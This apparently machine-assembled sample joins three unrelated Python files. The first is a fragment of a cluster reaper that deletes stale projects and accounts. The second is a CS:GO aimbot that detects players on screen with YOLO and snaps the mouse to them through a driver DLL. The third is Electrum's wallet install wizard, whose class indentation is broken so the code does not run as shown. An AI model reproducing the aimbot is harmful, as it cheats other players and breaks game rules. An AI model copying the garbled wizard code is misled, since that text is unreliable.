        print('INFO: checking for projects to be deleted: %s' % projects)
    # Register projects we have not seen before.
    for project in projects:
        if not project in project_cache:
            project_cache[project] = now
            account_cache.setdefault(project.account, set()).add(project)
    # Refresh the last-seen time for projects whose pod still exists.
    for project in projects:
        if pod_exists(project.pod):
            project_cache[project] = now
    # Reap projects whose pod has been absent for more than 90 seconds;
    # delete the owning account once its last project goes away.
    for project, last_seen in list(project_cache.items()):
        if now - last_seen > 90.0:
            account_cache[project.account].remove(project)
            if not account_cache[project.account]:
                delete_account(project.account)
                del account_cache[project.account]
            delete_project(project.name)
            del project_cache[project]
    # Track accounts that exist in the cluster but own no cached project.
    accounts = get_accounts()
    for account in accounts:
        name = account.metadata.name
        if not name in account_cache:
            if not name in orphan_cache:
                orphan_cache[name] = now
    # Delete accounts that have been orphaned for more than 90 seconds.
    for name, last_seen in list(orphan_cache.items()):
        if name in account_cache:
            del orphan_cache[name]
        elif now - last_seen > 90.0:
            delete_account(name)
            del orphan_cache[name]
def loop():
    """Run purge() forever, once a minute, surviving any exception."""
    while True:
        try:
            purge()
        except Exception as e:
            # Keep the reaper alive no matter what purge() throws.
            print('ERROR: unexpected exception:', e)
        time.sleep(60.0)
# Run the purge loop in a background thread; the main thread blocks on
# join() so the container keeps running.
# Bug fix: the original wrote ``thread.set_daemon = True``, which just
# creates an unused attribute -- the real flag is ``daemon`` (or the
# constructor argument), so the thread was never actually daemonic.
thread = threading.Thread(target=loop, daemon=True)
thread.start()
thread.join()
|
Main.py | import random
import time
from FPSDetect import *
from ctypes import *
# 加载相关工具函数
from utils.FPSUtils import *
dll = cdll.LoadLibrary(r'lib/Dll.dll') # 加载用C语言封装过的“易键鼠”dll
def shoot_screen(images_path='E:/data/CSGO/images/', interval=0.5):
    """Continuously capture the screen detection region and save the
    frames as JPEG training images.

    Parameters
    ----------
    images_path : str
        Directory the screenshots are written to. Defaults to the
        original hard-coded path for backward compatibility.
    interval : float
        Seconds to wait between captures.

    Runs forever; intended to be used as a background process target.
    """
    while True:
        # region is the capture area in (left, top, width, height) form
        img = pyautogui.screenshot(region=[LEFT, TOP, 640, 640])
        # File name: unix timestamp plus two random letters so frames
        # captured within the same second do not collide.
        suffix = ''.join(random.sample('zyxwvutsrqponmlkjihgfedcba', 2))
        img.save(images_path + str(int(time.time())) + suffix + '.jpg')
        time.sleep(interval)
if __name__ == "__main__":
    # ssp = Process(target=shoot_screen, name="ssp", args=())
    # ssp.start()
    # mPid = PID(0, 0, 1.0, 0)  # PID controller parameters: (target, p, i, d) (known issues)
    # Main loop: capture the screen region, run detection, and move the
    # mouse to the best target center when one is found.
    while True:
        try:
            img = ScreenShout()  # capture the screen detection region
            detections = detect(img)  # run YOLO detection on the capture
            btc, btp = FindBestCenter(detections)  # pick the optimal shooting center among the targets
            if btc is not None:  # a shootable target is present in the region
                dll.MoveTo2(int(LEFT + btc[0]), int(TOP + btc[1]))  # move the mouse via the mouse-driver DLL (replace with your own)
                # pyautogui.moveTo(int(LEFT + btc[0]), int(TOP + btc[1]))
        except:
            # NOTE(review): bare except swallows everything, including
            # KeyboardInterrupt; consider `except Exception` plus logging.
            print('ERROR!')
|
installwizard.py | # Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import json
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional, TYPE_CHECKING
from functools import partial
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea, QApplication)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage, StorageReadWriteError
from electrum.util import UserCancelled, InvalidPassword, WalletFileException, get_new_wallet_name
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack, ReRunDialog
from electrum.network import Network
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton, char_width_in_lineedit, PasswordLineEdit)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from .bip39_recovery_dialog import Bip39RecoveryDialog
from electrum.plugin import run_hook, Plugins
if TYPE_CHECKING:
from electrum.simple_config import SimpleConfig
from electrum.wallet_db import WalletDB
from . import ElectrumGui
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
    """Pie-chart widget visualizing an m-of-n cosigner configuration:
    n equal slices, the first m drawn green and the rest gray."""
    # Fixed square size of the widget in pixels.
    size = 120
    def __init__(self, m, n):
        QWidget.__init__(self)
        self.R = QRect(0, 0, self.size, self.size)
        self.setGeometry(self.R)
        self.setMinimumHeight(self.size)
        self.setMaximumHeight(self.size)
        self.m = m  # number of green slices (presumably required signers)
        self.n = n  # total number of slices (cosigners)
    def set_n(self, n):
        self.n = n
        self.update()  # schedule a repaint
    def set_m(self, m):
        self.m = m
        self.update()  # schedule a repaint
    def paintEvent(self, event):
        # Slice separators are drawn in the background color so the
        # slices appear visually separated.
        bgcolor = self.palette().color(QPalette.Background)
        pen = QPen(bgcolor, 7, Qt.SolidLine)
        qp = QPainter()
        qp.begin(self)
        qp.setPen(pen)
        qp.setRenderHint(QPainter.Antialiasing)
        qp.setBrush(Qt.gray)
        # Qt pie angles are expressed in 1/16ths of a degree, hence the
        # factor of 16; each slice spans an equal 360/n-degree arc.
        for i in range(self.n):
            alpha = int(16* 360 * i/self.n)
            alpha2 = int(16* 360 * 1/self.n)
            qp.setBrush(Qt.green if i<self.m else Qt.gray)
            qp.drawPie(self.R, alpha, alpha2)
        qp.end()
def wizard_dialog(func):
    """Decorator for InstallWizard dialog-step methods.

    Wraps a dialog step so that Back/Cancel navigation (GoBack) and
    dialog re-runs (ReRunDialog) unwind and replay the wizard's dialog
    stack correctly. The wrapped function's return value (normalized to
    a tuple) is passed on to the ``run_next`` callback from kwargs.
    """
    def func_wrapper(*args, **kwargs):
        run_next = kwargs['run_next']
        wizard = args[0]  # type: InstallWizard
        while True:
            #wizard.logger.debug(f"dialog stack. len: {len(wizard._stack)}. stack: {wizard._stack}")
            # First dialog shows "Cancel"; later dialogs show "Back".
            wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
            # current dialog
            try:
                out = func(*args, **kwargs)
                if type(out) is not tuple:
                    out = (out,)
            except GoBack:
                if not wizard.can_go_back():
                    # Nothing to go back to: treat as user cancellation.
                    wizard.close()
                    raise UserCancelled
                else:
                    # to go back from the current dialog, we just let the caller unroll the stack:
                    raise
            # next dialog
            try:
                while True:
                    try:
                        run_next(*out)
                    except ReRunDialog:
                        # restore state, and then let the loop re-run next
                        wizard.go_back(rerun_previous=False)
                    else:
                        break
            except GoBack as e:
                # to go back from the next dialog, we ask the wizard to restore state
                wizard.go_back(rerun_previous=False)
                # and we re-run the current dialog
                if wizard.can_go_back():
                    # also rerun any calculations that might have populated the inputs to the current dialog,
                    # by going back to just after the *previous* dialog finished
                    raise ReRunDialog() from e
                else:
                    continue
            else:
                break
    return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
    """Raised when the selected wallet file is already open in this
    process; carries the live wallet so the caller can focus its window."""
    def __init__(self, wallet: Abstract_Wallet):
        super().__init__()
        self.wallet = wallet  # the already-open wallet instance
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
    def __init__(self, config: 'SimpleConfig', app: QApplication, plugins: 'Plugins', *, gui_object: 'ElectrumGui'):
        """Build the wizard window: title, scrollable content area, logo
        column, Back/Next buttons, and the nested event loop used to
        block until the user advances, goes back, or cancels."""
        QDialog.__init__(self, None)
        BaseWizard.__init__(self, config, plugins)
        self.setWindowTitle('Electrum - ' + _('Install Wizard'))
        self.app = app
        self.config = config
        self.gui_thread = gui_object.gui_thread
        self.setMinimumSize(600, 400)
        self.accept_signal.connect(self.accept)
        self.title = QLabel()
        self.main_widget = QWidget()
        self.back_button = QPushButton(_("Back"), self)
        # First step has nothing to go back to, so it reads "Cancel".
        self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
        self.next_button = QPushButton(_("Next"), self)
        self.next_button.setDefault(True)
        self.logo = QLabel()
        self.please_wait = QLabel(_("Please wait..."))
        self.please_wait.setAlignment(Qt.AlignCenter)
        self.icon_filename = None
        # Nested event loop; exit codes: 0 = rejected, 1 = back, 2 = next.
        self.loop = QEventLoop()
        self.rejected.connect(lambda: self.loop.exit(0))
        self.back_button.clicked.connect(lambda: self.loop.exit(1))
        self.next_button.clicked.connect(lambda: self.loop.exit(2))
        outer_vbox = QVBoxLayout(self)
        inner_vbox = QVBoxLayout()
        inner_vbox.addWidget(self.title)
        inner_vbox.addWidget(self.main_widget)
        inner_vbox.addStretch(1)
        inner_vbox.addWidget(self.please_wait)
        inner_vbox.addStretch(1)
        # Content area scrolls vertically only.
        scroll_widget = QWidget()
        scroll_widget.setLayout(inner_vbox)
        scroll = QScrollArea()
        scroll.setWidget(scroll_widget)
        scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
        scroll.setWidgetResizable(True)
        # Logo column sits to the left of the scrollable content.
        icon_vbox = QVBoxLayout()
        icon_vbox.addWidget(self.logo)
        icon_vbox.addStretch(1)
        hbox = QHBoxLayout()
        hbox.addLayout(icon_vbox)
        hbox.addSpacing(5)
        hbox.addWidget(scroll)
        hbox.setStretchFactor(scroll, 1)
        outer_vbox.addLayout(hbox)
        outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
        self.set_icon('electrum.png')
        self.show()
        self.raise_()
        self.refresh_gui()  # Need for QT on MacOSX.  Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
    """Let the user pick (or create) a wallet file.

    Shows a file-name field with live feedback, a password field for
    encrypted files, and a "Create New Wallet" shortcut.  Blocks in the
    wizard event loop until the user settles on a usable storage or cancels.

    Returns (chosen_path, storage); storage is None when the file does not
    exist yet (a new wallet will be created at chosen_path).
    Raises UserCancelled or WalletAlreadyOpenInMemory.
    """
    vbox = QVBoxLayout()
    hbox = QHBoxLayout()
    hbox.addWidget(QLabel(_('Wallet') + ':'))
    name_e = QLineEdit()
    hbox.addWidget(name_e)
    button = QPushButton(_('Choose...'))
    hbox.addWidget(button)
    vbox.addLayout(hbox)
    msg_label = WWLabel('')
    vbox.addWidget(msg_label)
    hbox2 = QHBoxLayout()
    pw_e = PasswordLineEdit('', self)
    pw_e.setFixedWidth(17 * char_width_in_lineedit())
    pw_label = QLabel(_('Password') + ':')
    hbox2.addWidget(pw_label)
    hbox2.addWidget(pw_e)
    hbox2.addStretch()
    vbox.addLayout(hbox2)
    vbox.addSpacing(50)
    vbox_create_new = QVBoxLayout()
    vbox_create_new.addWidget(QLabel(_('Alternatively') + ':'), alignment=Qt.AlignLeft)
    button_create_new = QPushButton(_('Create New Wallet'))
    button_create_new.setMinimumWidth(120)
    vbox_create_new.addWidget(button_create_new, alignment=Qt.AlignLeft)
    widget_create_new = QWidget()
    widget_create_new.setLayout(vbox_create_new)
    vbox_create_new.setContentsMargins(0, 0, 0, 0)
    vbox.addWidget(widget_create_new)
    self.set_layout(vbox, title=_('Electrum wallet'))
    # Re-populated by on_filename() every time the file-name text changes.
    temp_storage = None  # type: Optional[WalletStorage]
    wallet_folder = os.path.dirname(path)
    def on_choose():
        # "Choose..." button: native file picker; filling name_e triggers
        # on_filename() via the textChanged connection below.
        path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
        if path:
            name_e.setText(path)
    def on_filename(filename):
        # FIXME? "filename" might contain ".." (etc) and hence sketchy path traversals are possible
        nonlocal temp_storage
        temp_storage = None
        msg = None
        path = os.path.join(wallet_folder, filename)
        wallet_from_memory = get_wallet_from_daemon(path)
        try:
            if wallet_from_memory:
                # Wallet already open in the daemon: reuse its storage.
                temp_storage = wallet_from_memory.storage  # type: Optional[WalletStorage]
            else:
                temp_storage = WalletStorage(path)
        except (StorageReadWriteError, WalletFileException) as e:
            msg = _('Cannot read file') + f'\n{repr(e)}'
        except Exception as e:
            self.logger.exception('')
            msg = _('Cannot read file') + f'\n{repr(e)}'
        # "Next" is only usable once we have some storage object.
        self.next_button.setEnabled(temp_storage is not None)
        user_needs_to_enter_password = False
        if temp_storage:
            if not temp_storage.file_exists():
                msg =_("This file does not exist.") + '\n' \
                      + _("Press 'Next' to create this wallet, or choose another file.")
            elif not wallet_from_memory:
                if temp_storage.is_encrypted_with_user_pw():
                    msg = _("This file is encrypted with a password.") + '\n' \
                          + _('Enter your password or choose another file.')
                    user_needs_to_enter_password = True
                elif temp_storage.is_encrypted_with_hw_device():
                    msg = _("This file is encrypted using a hardware device.") + '\n' \
                          + _("Press 'Next' to choose device to decrypt.")
                else:
                    msg = _("Press 'Next' to open this wallet.")
            else:
                msg = _("This file is already open in memory.") + "\n" \
                      + _("Press 'Next' to create/focus window.")
        if msg is None:
            msg = _('Cannot read file')
        msg_label.setText(msg)
        # "Create New Wallet" only makes sense while pointing at an existing file.
        widget_create_new.setVisible(bool(temp_storage and temp_storage.file_exists()))
        if user_needs_to_enter_password:
            pw_label.show()
            pw_e.show()
            pw_e.setFocus()
        else:
            pw_label.hide()
            pw_e.hide()
    button.clicked.connect(on_choose)
    button_create_new.clicked.connect(
        partial(
            name_e.setText,
            get_new_wallet_name(wallet_folder)))
    name_e.textChanged.connect(on_filename)
    # Setting the initial text fires on_filename() once to populate the UI.
    name_e.setText(os.path.basename(path))
    def run_user_interaction_loop():
        # Spin the wizard loop until we have a decrypted/creatable storage.
        while True:
            if self.loop.exec_() != 2:  # 2 = next
                raise UserCancelled()
            assert temp_storage
            if temp_storage.file_exists() and not temp_storage.is_encrypted():
                break
            if not temp_storage.file_exists():
                break
            wallet_from_memory = get_wallet_from_daemon(temp_storage.path)
            if wallet_from_memory:
                raise WalletAlreadyOpenInMemory(wallet_from_memory)
            if temp_storage.file_exists() and temp_storage.is_encrypted():
                if temp_storage.is_encrypted_with_user_pw():
                    password = pw_e.text()
                    try:
                        temp_storage.decrypt(password)
                        break
                    except InvalidPassword as e:
                        self.show_message(title=_('Error'), msg=str(e))
                        continue
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=repr(e))
                        raise UserCancelled()
                elif temp_storage.is_encrypted_with_hw_device():
                    try:
                        self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=temp_storage)
                    except InvalidPassword as e:
                        self.show_message(title=_('Error'),
                                          msg=_('Failed to decrypt using this hardware device.') + '\n' +
                                              _('If you use a passphrase, make sure it is correct.'))
                        # Restart the whole selection flow from scratch.
                        self.reset_stack()
                        return self.select_storage(path, get_wallet_from_daemon)
                    except (UserCancelled, GoBack):
                        raise
                    except BaseException as e:
                        self.logger.exception('')
                        self.show_message(title=_('Error'), msg=repr(e))
                        raise UserCancelled()
                    if temp_storage.is_past_initial_decryption():
                        break
                    else:
                        raise UserCancelled()
                else:
                    raise Exception('Unexpected encryption version')
    try:
        run_user_interaction_loop()
    finally:
        try:
            # Scrub the typed password from the widget regardless of outcome.
            pw_e.clear()
        except RuntimeError:  # wrapped C/C++ object has been deleted.
            pass  # happens when decrypting with hw device
    return temp_storage.path, (temp_storage if temp_storage.file_exists() else None)
def run_upgrades(self, storage: WalletStorage, db: 'WalletDB') -> None:
    """Handle legacy wallet formats and incomplete creations before opening.

    May prompt the user (split pre-2.7 multi-account wallets, finish an
    interrupted creation) and raises UserCancelled when the old storage
    must not be opened afterwards.
    """
    path = storage.path
    if db.requires_split():
        # Pre-2.7 wallets could hold several accounts; offer to split them
        # into one file per account.
        self.hide()
        msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
                "Do you want to split your wallet into multiple files?").format(path)
        if not self.question(msg):
            return
        file_list = db.split_accounts(path)
        msg = _('Your accounts have been moved to') + ':\n' + '\n'.join(file_list) + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
        if self.question(msg):
            os.remove(path)
            self.show_warning(_('The file was removed'))
        # raise now, to avoid having the old storage opened
        raise UserCancelled()
    action = db.get_action()
    if action and db.requires_upgrade():
        raise WalletFileException('Incomplete wallet files cannot be upgraded.')
    if action:
        # Wallet creation was interrupted; offer to finish (or delete) it.
        self.hide()
        msg = _("The file '{}' contains an incompletely created wallet.\n"
                "Do you want to complete its creation now?").format(path)
        if not self.question(msg):
            if self.question(_("Do you want to delete '{}'?").format(path)):
                os.remove(path)
                self.show_warning(_('The file was removed'))
            return
        self.show()
        self.data = json.loads(storage.read())
        # Resume the pending wizard action, then persist the resulting data.
        self.run(action)
        for k, v in self.data.items():
            db.put(k, v)
        db.write(storage)
        return
    if db.requires_upgrade():
        self.upgrade_db(storage, db)
def on_error(self, exc_info):
    """Report an unexpected exception to the user; UserCancelled is silent."""
    err = exc_info[1]
    if isinstance(err, UserCancelled):
        return
    self.logger.error("on_error", exc_info=exc_info)
    self.show_error(str(err))
def set_icon(self, filename):
    """Swap the wizard logo to *filename*; return the previous icon filename."""
    prior_filename = self.icon_filename
    self.icon_filename = filename
    pixmap = QPixmap(icon_path(filename)).scaledToWidth(
        60, mode=Qt.SmoothTransformation)
    self.logo.setPixmap(pixmap)
    return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
    """Install *layout* as the wizard's main content and make it visible."""
    self.title.setText("<b>%s</b>"%title if title else "")
    self.title.setVisible(bool(title))
    # Reparent any prior layout onto a throwaway widget so Qt releases it.
    old_layout = self.main_widget.layout()
    if old_layout:
        QWidget().setLayout(old_layout)
    self.main_widget.setLayout(layout)
    self.back_button.setEnabled(True)
    self.next_button.setEnabled(next_enabled)
    if next_enabled:
        self.next_button.setFocus()
    self.main_widget.setVisible(True)
    self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
                next_enabled=True):
    """Show *layout*, spin the wizard event loop, and return the result code.

    Result codes: 0 = cancel/close, 1 = back, 2 = next.
    Raises UserCancelled (on 0, unless raise_on_cancel is False) or GoBack.
    """
    self.set_layout(layout, title, next_enabled)
    result = self.loop.exec_()
    if raise_on_cancel and not result:
        raise UserCancelled()
    if result == 1:
        raise GoBack from None
    # Switch to the "please wait" state until the next layout is installed.
    self.title.setVisible(False)
    self.back_button.setEnabled(False)
    self.next_button.setEnabled(False)
    self.main_widget.setVisible(False)
    self.please_wait.setVisible(True)
    self.refresh_gui()
    return result
def refresh_gui(self):
    """Force a repaint; empirically needs two processEvents passes."""
    for _pass in range(2):
        self.app.processEvents()
def remove_from_recently_open(self, filename):
    """Drop *filename* from the config's recently-opened wallet list."""
    self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
    """Show a keys-entry layout and return the text the user typed."""
    layout = KeysLayout(
        parent=self,
        header_layout=message,
        is_valid=is_valid,
        allow_multi=allow_multi,
    )
    self.exec_layout(layout, title, next_enabled=False)
    return layout.get_text()
def seed_input(self, title, message, is_seed, options):
    """Show a seed-entry layout; return (seed, is_bip39, is_ext)."""
    layout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
    self.exec_layout(layout, title, next_enabled=False)
    return layout.get_seed(), layout.is_bip39, layout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
    """Prompt for a master public key; return the text the user entered."""
    header = QHBoxLayout()
    label = WWLabel(message)
    label.setMinimumWidth(400)
    header.addWidget(label)
    if show_wif_help:
        # Optional help button explaining WIF keys.
        header.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
    return self.text_input(title, header, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
    """Prompt for cosigner number *index*'s xpub (or xprv); return the text."""
    title = _("Add Cosigner") + " %d"%index
    message = ' '.join((
        _('Please enter the master public key (xpub) of your cosigner.'),
        _('Enter their master private key (xprv) if you want to be able to sign for them.'),
    ))
    return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
    """Ask the user to type their seed phrase to restore a wallet."""
    # Offer the seed-layout options that this wizard instance enables.
    options = [name for name, enabled
               in (('ext', self.opt_ext), ('bip39', self.opt_bip39))
               if enabled]
    title = _('Enter Seed')
    message = _('Please enter your seed phrase in order to restore your wallet.')
    return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, seed, test):
    """Make the user retype the seed to confirm they wrote it down."""
    # Clear the clipboard so the seed cannot simply be pasted back.
    self.app.clipboard().clear()
    title = _('Confirm Seed')
    message = ' '.join((
        _('Your seed is important!'),
        _('If you lose your seed, your money will be permanently lost.'),
        _('To make sure that you have properly saved your seed, please retype it here.'),
    ))
    typed_seed, _unused_bip39, _unused_ext = self.seed_input(title, message, test, None)
    return typed_seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
    """Display the freshly generated seed; return whether 'ext' was ticked."""
    title = _("Your wallet generation seed is:")
    layout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
    self.exec_layout(layout)
    return layout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
    """Run a password-entry layout; return (new_password, encrypt_wallet)."""
    pw_form = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
                             force_disable_encrypt_cb=force_disable_encrypt_cb)
    pw_form.encrypt_cb.setChecked(True)
    try:
        self.exec_layout(pw_form.layout())
        return pw_form.new_password(), pw_form.encrypt_cb.isChecked()
    finally:
        # Always scrub the password fields, even on cancel/back.
        pw_form.clear_password_fields()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
    """Request the user enter a new password and confirm it. Return
    the password or None for no password."""
    return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
    """Ask whether to encrypt the wallet file (hw-device flow); return bool."""
    form = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
    form.encrypt_cb.setChecked(True)
    self.exec_layout(form.layout())
    return form.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
    """Wizard step that simply shows *message* and waits for Next."""
    self.confirm(message, title)
def confirm(self, message, title):
    """Show *message* in a minimal layout and wait for user confirmation."""
    box = QVBoxLayout()
    box.addWidget(WWLabel(message))
    self.exec_layout(box, title)
@wizard_dialog
def action_dialog(self, action, run_next):
    """Wizard step that just dispatches *action* through self.run."""
    self.run(action)
def terminate(self, **kwargs):
    """Ask the wizard to accept/close; extra keyword args are ignored."""
    self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
    """Run *task* on a worker thread while showing *msg*; keep the GUI alive.

    Blocks until the thread finishes, then calls *on_finished* if given.
    """
    label = WWLabel(msg)
    label.setMinimumWidth(300)
    label.setAlignment(Qt.AlignCenter)
    box = QVBoxLayout()
    box.addSpacing(100)
    box.addWidget(label)
    self.set_layout(box, next_enabled=False)
    self.back_button.setEnabled(False)
    worker = threading.Thread(target=task)
    worker.start()
    # Poll at ~60 Hz, pumping Qt events so the window stays responsive.
    while worker.is_alive():
        worker.join(1.0/60)
        if worker.is_alive():
            self.refresh_gui()
    if on_finished:
        on_finished()
def run_task_without_blocking_gui(self, task, *, msg=None):
    """Run *task* from the GUI thread without freezing the GUI.

    Returns the task's result, or re-raises whatever exception it raised.
    """
    assert self.gui_thread == threading.current_thread(), 'must be called from GUI thread'
    if msg is None:
        msg = _("Please wait...")
    outcome = {}  # holds 'res' on success or 'exc' on failure
    def task_wrapper():
        try:
            outcome['res'] = task()
        except Exception as e:
            outcome['exc'] = e
    self.waiting_dialog(task_wrapper, msg=msg)
    if 'exc' in outcome:
        raise outcome['exc']
    return outcome.get('res')
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
    """Present *choices* (value, label) pairs; return the selected value."""
    clayout = ChoicesLayout(message, [choice[1] for choice in choices])
    box = QVBoxLayout()
    box.addLayout(clayout.layout())
    self.exec_layout(box, title)
    return choices[clayout.selected_index()][0]
def query_choice(self, msg, choices):
    """called by hardware wallets"""
    # Present *choices* as a radio list and return the chosen index.
    clayout = ChoicesLayout(msg, choices)
    box = QVBoxLayout()
    box.addLayout(clayout.layout())
    self.exec_layout(box, '')
    return clayout.selected_index()
@wizard_dialog
def derivation_and_script_type_gui_specific_dialog(
        self,
        *,
        title: str,
        message1: str,
        choices: List[Tuple[str, str, str]],
        hide_choices: bool = False,
        message2: str,
        test_text: Callable[[str], int],
        run_next,
        default_choice_idx: int = 0,
        get_account_xpub=None,
) -> Tuple[str, str]:
    """Ask for a script type (radio choices) and a derivation path (line edit).

    Each item of *choices* is (value, label, default_derivation_path).
    Returns (derivation_path_text, chosen_script_type_value).
    """
    vbox = QVBoxLayout()
    if get_account_xpub:
        button = QPushButton(_("Detect Existing Accounts"))
        def on_account_select(account):
            # Invoked by Bip39RecoveryDialog with a discovered account:
            # select the matching script type and fill its derivation path.
            # NOTE: c_values, clayout and line are defined later in this
            # method; the names resolve late, when the callback fires.
            script_type = account["script_type"]
            if script_type == "p2pkh":
                script_type = "standard"
            button_index = c_values.index(script_type)
            button = clayout.group.buttons()[button_index]
            button.setChecked(True)
            line.setText(account["derivation_path"])
        button.clicked.connect(lambda: Bip39RecoveryDialog(self, get_account_xpub, on_account_select))
        vbox.addWidget(button, alignment=Qt.AlignLeft)
        vbox.addWidget(QLabel(_("Or")))
    c_values = [x[0] for x in choices]
    c_titles = [x[1] for x in choices]
    c_default_text = [x[2] for x in choices]
    def on_choice_click(clayout):
        # Keep the derivation-path line in sync with the selected choice.
        idx = clayout.selected_index()
        line.setText(c_default_text[idx])
    clayout = ChoicesLayout(message1, c_titles, on_choice_click,
                            checked_index=default_choice_idx)
    if not hide_choices:
        vbox.addLayout(clayout.layout())
    vbox.addWidget(WWLabel(message2))
    line = QLineEdit()
    def on_text_change(text):
        # Enable "Next" only while test_text() accepts the current text.
        self.next_button.setEnabled(test_text(text))
    line.textEdited.connect(on_text_change)
    on_choice_click(clayout)  # set default text for "line"
    vbox.addWidget(line)
    self.exec_layout(vbox, title)
    choice = c_values[clayout.selected_index()]
    return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
                presets=(), warn_issue4566=False):
    """Single-line text prompt.

    *test* gates the Next button; *presets* are (label, text) buttons that
    fill the line; *warn_issue4566* shows a passphrase-whitespace warning
    while the text contains non-normalised whitespace.
    Returns the entered text.
    """
    vbox = QVBoxLayout()
    vbox.addWidget(WWLabel(message))
    line = QLineEdit()
    line.setText(default)
    def f(text):
        self.next_button.setEnabled(test(text))
        if warn_issue4566:
            # warn_issue4566_label is created below; the name resolves late,
            # when this textEdited callback actually fires.
            text_whitespace_normalised = ' '.join(text.split())
            warn_issue4566_label.setVisible(text != text_whitespace_normalised)
    line.textEdited.connect(f)
    vbox.addWidget(line)
    vbox.addWidget(WWLabel(warning))
    warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
    warn_issue4566_label.setVisible(False)
    vbox.addWidget(warn_issue4566_label)
    for preset in presets:
        button = QPushButton(preset[0])
        # Bind the preset text as a default arg to avoid late-binding bugs.
        button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
        button.setMinimumWidth(150)
        hbox = QHBoxLayout()
        hbox.addWidget(button, alignment=Qt.AlignCenter)
        vbox.addLayout(hbox)
    self.exec_layout(vbox, title, next_enabled=test(default))
    return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
    """Display the wallet's master public key for sharing with cosigners."""
    msg = ' '.join((
        _("Here is your master public key."),
        _("Please share it with your cosigners.")
    ))
    box = QVBoxLayout()
    slayout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
    box.addLayout(slayout.layout())
    self.exec_layout(box, _('Master Public Key'))
    return None
def init_network(self, network: 'Network'):
    """Ask how to connect to a server: auto-connect or manual selection."""
    message = _("Electrum communicates with remote servers to get "
                "information about your transactions and addresses. The "
                "servers all fulfill the same purpose only differing in "
                "hardware. In most cases you simply want to let Electrum "
                "pick one at random. However if you prefer feel free to "
                "select a server manually.")
    choices = [_("Auto connect"), _("Select server manually")]
    title = _("How do you want to connect to a server? ")
    clayout = ChoicesLayout(message, choices)
    self.back_button.setText(_('Cancel'))
